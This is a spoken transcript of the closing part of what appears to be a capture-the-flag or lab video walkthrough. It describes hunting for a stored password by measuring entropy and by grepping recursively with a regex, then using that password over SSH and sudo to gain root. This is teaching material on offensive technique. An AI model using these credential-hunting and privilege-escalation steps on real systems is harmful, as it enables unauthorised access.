think by like putting a capital here and like an @ here, this may increase the entropy, but we see it's still 2.8 because even though these are like wider ranges on like the bit field, like the number is higher or lower, it doesn't really matter because we're not really repeating characters, right? So in a password, you generally have like uppercase, letters, symbols, things like that. And the less it repeats, the higher that entropy is going to be. So let's say some of those underscores are now dashes. We can increase it. But because someone's trying to make a stronger password, by doing all these random substitutions, we can use entropy to hunt them down, right? So it's not a bulletproof way, but it is a good way to find things. Another way we could have done this, that I've done in the past, is a lot of people, when they do passphrases, they have a habit of separating things with underscores. So we can see in this one has a word in all capitals, then an underscore, and a word in all lowercase. I changed that E to a 3. But because they just do that, I mean, you can attack it with a grep-e, I want to say, for regex. And we'll just go anything A to Z, 1 through 9 characters. Then we can separate by an like dash or underscore. Then look for A to Z, 1 to 9 characters again. Something like this. And then -r for recursive period. And the only string that comes in this whole directory is going to be this, because it's got the word the, then undercase best, right? So you can do a lot of weird regular expressions to hunt passwords or looking at entropy. There's a bunch of ways we can do that, but this was the way we did. We can grab this password, and if we go to SSH, let's do, we had a SSH as John. So sudo -l, paste this in, and we can see we now have John's password, so we can run sudo, and John may run any command. So since we have his password now, we can escalate to root. So hope you guys enjoyed that, and that'll be the video. Take care, and I'll see you all next time.